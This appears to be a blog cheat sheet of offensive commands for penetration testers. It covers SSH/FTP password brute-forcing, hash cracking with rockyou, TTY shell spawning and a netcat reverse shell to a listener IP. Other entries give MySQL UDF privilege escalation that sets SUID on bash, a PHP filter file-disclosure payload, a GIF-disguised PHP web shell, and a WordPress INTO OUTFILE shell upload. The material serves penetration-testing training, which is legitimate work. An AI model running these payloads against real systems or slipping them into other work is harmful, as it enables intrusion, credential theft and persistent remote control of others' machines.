Basic Commands for Penetration Testers: Part 1

1. Bruteforce:

a) Hydra:

hydra -l root -P [Path_to_file] [IPAddress] ssh

l → enter username  or  L → Username File

p → enter password or   P → Password File

 

To Bruteforce ftp using password same as username and reverse of username:

hydra -l username -e nsr ftp://IP_Address

nsr for try username as:

n → null

s → same as username

r → reverse of username

 

b) Ncrack:

ncrack -p 22 –user <Usernames seperated by comma> -P [Path_to_Password_File] [IPAddress]

or

ncrack -p 22 -U <Usernames Filename> –pass [comma separated password list] [IPAddress]

p → port number

 

c) Medusa:

medusa -u [username] -P [Path_to_Password File] -h [IPAddress] -M ssh

or

medusa -U [username File] -p [Password] -h [IPAddress] -M ssh

M → Name of module eg: ssh

 

2. Find all the files in Linux with suid bit set

find [path_to_search] -perm /u=s

/          –> path to root directory

-perm      –> permission

/u=s        –> Here u is for owner of the file, s stands for suid bit

2>           –> ‘2’ is file descriptor for stderr and redirects ‘>’ them to null device file

/dev/null  –> Null device file

 

3. Find a file containing specific word in Linux

grep -rin ‘[path to search]’ -e ‘[word to search]’

-r refers to recursive

-i refers to ignore case (optional)

-n refers to line number of the file where specific word is found

 

4. enum4linux

Tool for enumerating information from Windows and Samba systems.

Usage: ./enum4linux.pl [options] ip

 

5. nikto

Scan web server for known vulnerabilities and bruteforce directories. Always look for ssl certificate, if it is then try to connect to https

nikto -h [IPAddress|URL]

 

6. Listen on port using command:

nc -lvp [port]

 

7. Base 64 decode of any string:

echo [string] | base64 -d

 

8. Spawning a TTY shell

python -c ‘import pty; pty.spawn(“/bin/sh”)’

echo os.system(‘/bin/bash’)

/bin/sh -i

perl —e ‘exec “/bin/sh”;’

 

9. If the file ‘lib_mysqludf_sys.so’ already exist on the system, get privilege escalation by using below mysql queries with example:

mysql> use mysql;

mysql> create function sys_exec returns integer soname ‘lib_mysqludf_sys.so’;

mysql> select sys_exec(‘chmod u+s /bin/bash’);

 

10. Run sudo command as other user:

sudo -u username [command]

 

11. Search IP locally using command other than nmap:

netdiscover -r [IP-Range]

 

12. Source of PHP file by using the function ‘php://filter/convert.base64_encode/resource’ for any parameter in URL.

Example:

http://xyz.com/index.php?m=php://filter/convert.base64-encode/resource=index

this gives source code for index.php file. Similarly we can extract other files too.

 

13. Create fake PNG file containing PHP code.

GIF89;

<?php system($_GET[“cmd”]) ?>

 

14. Execute bash command to give shell access to the listener:

nc -nv 192.168.1.71 4444 -e /bin/bash

 

15. Permanently set $PATH variable with some changes:

# add this command to `~/.profile` file

$ export PATH=$PATH:/myNewDir

# then run the source command

$ source ~/.profile

 

16. Using command line ‘dirb’ for bruteforcing directories and files

dirb [IP Address]:[port]

 

17. Download a file using wget

wget [http|https]://[IPAddress]:[port]/Folder/filename

 

18. Command to see file type:

file [filename]

 

19. Command to see only strings in file

strings [Filename]

 

20. WordPress scanner command:

wpscan –url www.example.com

->Enumerate installed plugins …

wpscan –url www.example.com –enumerate p

->Enumerate all plugins …

wpscan –url www.example.com –enumerate ap

->Enumerate users …

wpscan –url www.example.com –enumerate u

->Use a HTTP proxy …

wpscan –url www.example.com –proxy 127.0.0.1:8118

 

21. Searchspolit command to find exploits present in kali linux

searchsploit [searchpattern]

 

22. Crack the hash using ‘john’ command

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Where hash.txt -> file containing the hash t be cracked.

 

23. Connect to mysql using IP Address:

mysql –h [IP] -u [username] -p [password]

 

24. Read the bash history of all users while in /home directory

find -name “.bash_history” -exec cat {} \;

Here below refers to:

find -name –> finds all the files in /home directory recursively with “.bash_history” name

-exec –> executes the command given after that

{} –> Refers to the name of the files that were found

Or

cat */.bash_history

 

25. sudo -l command use:

the -l (list) option will list the allowed (and forbidden) commands for the invoking user (or the user specified by the -U option) on the current host.

 

26. WordPress users can upload a shell using INTO OUTfile.

select “<?php echo shell_exec($_GET[‘cmd’]);?>” into outfile “/var/www/https/[blog_folder]/wp-content/uploads/shell.php”;

Leave a Reply

Your email address will not be published. Required fields are marked *